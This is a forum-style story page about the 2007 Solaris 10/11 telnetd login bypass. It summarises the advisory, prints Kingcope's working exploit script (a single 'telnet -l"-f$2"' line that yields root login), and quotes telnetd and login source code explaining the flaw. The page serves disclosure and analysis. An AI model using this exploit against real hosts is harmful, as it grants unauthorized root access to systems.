Home » Story links » Param's story links

Sun Solaris Telnet Bypass

Link: http://research.eeye.com/html/alerts/zeroday/20070212.html
Points: 1012 views User: Param Comments: 2 Comments Tag:

A login bypass vulnerability exists within the Telnet daemon of Sun Solaris 10 and 11. This vulnerability allows an attacker to remotely login as a privileged user (i.e. 'root') if the telnet daemon is running with root privileges on the targeted host. The vulnerability exists because the Solaris Telnet service does not scrub the switches before passing the login name to the login process. Login will then auto-login the user specified following the '-f' switch, as demonstrated by the referenced proof of concept.

This vulnerability allows for a remote attacker to anonymously login as any privileged user (including root) into a Solaris 10/11 host running the telnet daemon as root. This allows for rapid system compromise without any user interaction.


#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos "
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1


Zero-day vulnerability

Submitted by Nov1 on Tue, 2007-02-13 16:46.

The SANS Institute's Internet Storm Center advised network administrators this week to disable all telnet functions due to a zero-day vulnerability in Sun Microsystems Solaris versions 10 and 11.

The flaw – which could allow a malicious user access to a Solaris host – does not exist in Solaris versions 9 and lower, according to Internet Storm Center researcher Donald Smith.

Zero-day vulnerability found in Sun Microsystems Solaris 10 and 11

»

Solaris telnetd Analysis

Submitted by Amiable on Tue, 2007-02-13 17:13.

From Solaris telnetd Analysis - SecuriTeam Blogs
-----------------------------------
kcope has put on a short PDF paper on why the vulnerability in telnetd happens:

/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c

3198
3199 } else /* default, no auth. info available, login does it all */ {
3200 (void) execl(LOGIN_PROGRAM, “login”,
3201 “-p”, “-h”, host, “-d”, slavename,
3202 getenv(”USER”), 0);
3203 }

/usr/src/cmd/login/login.c

1397 break;
1398
1399 case ‘f’:
1400 /*
1401 * Must be root to bypass authentication
1402 * otherwise we exit() as punishment for trying.
1403 */
1404 if (getuid() != 0 || geteuid() != 0) {
1405 audit_error = ADT_FAIL_VALUE_AUTH_BYPASS;
1406
1407 login_exit(1); /* sigh */
1408 /*NOTREACHED*/
1409 }
1410 /* save fflag user name for future use */
1411 SCPYL(user_name, optarg);
1412 fflag = B_TRUE;

As you can see the “Must be root to bypass authentication” should already rise some worries, but what is funnier that because we are requesting a different user than ‘root’ we actually get ‘root’ access, as login thinks we are already ‘root’, when its called by in.telnetd.

»

Post new comment

  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <h1> <quote> <img>
  • Lines and paragraphs break automatically.

More information about formatting options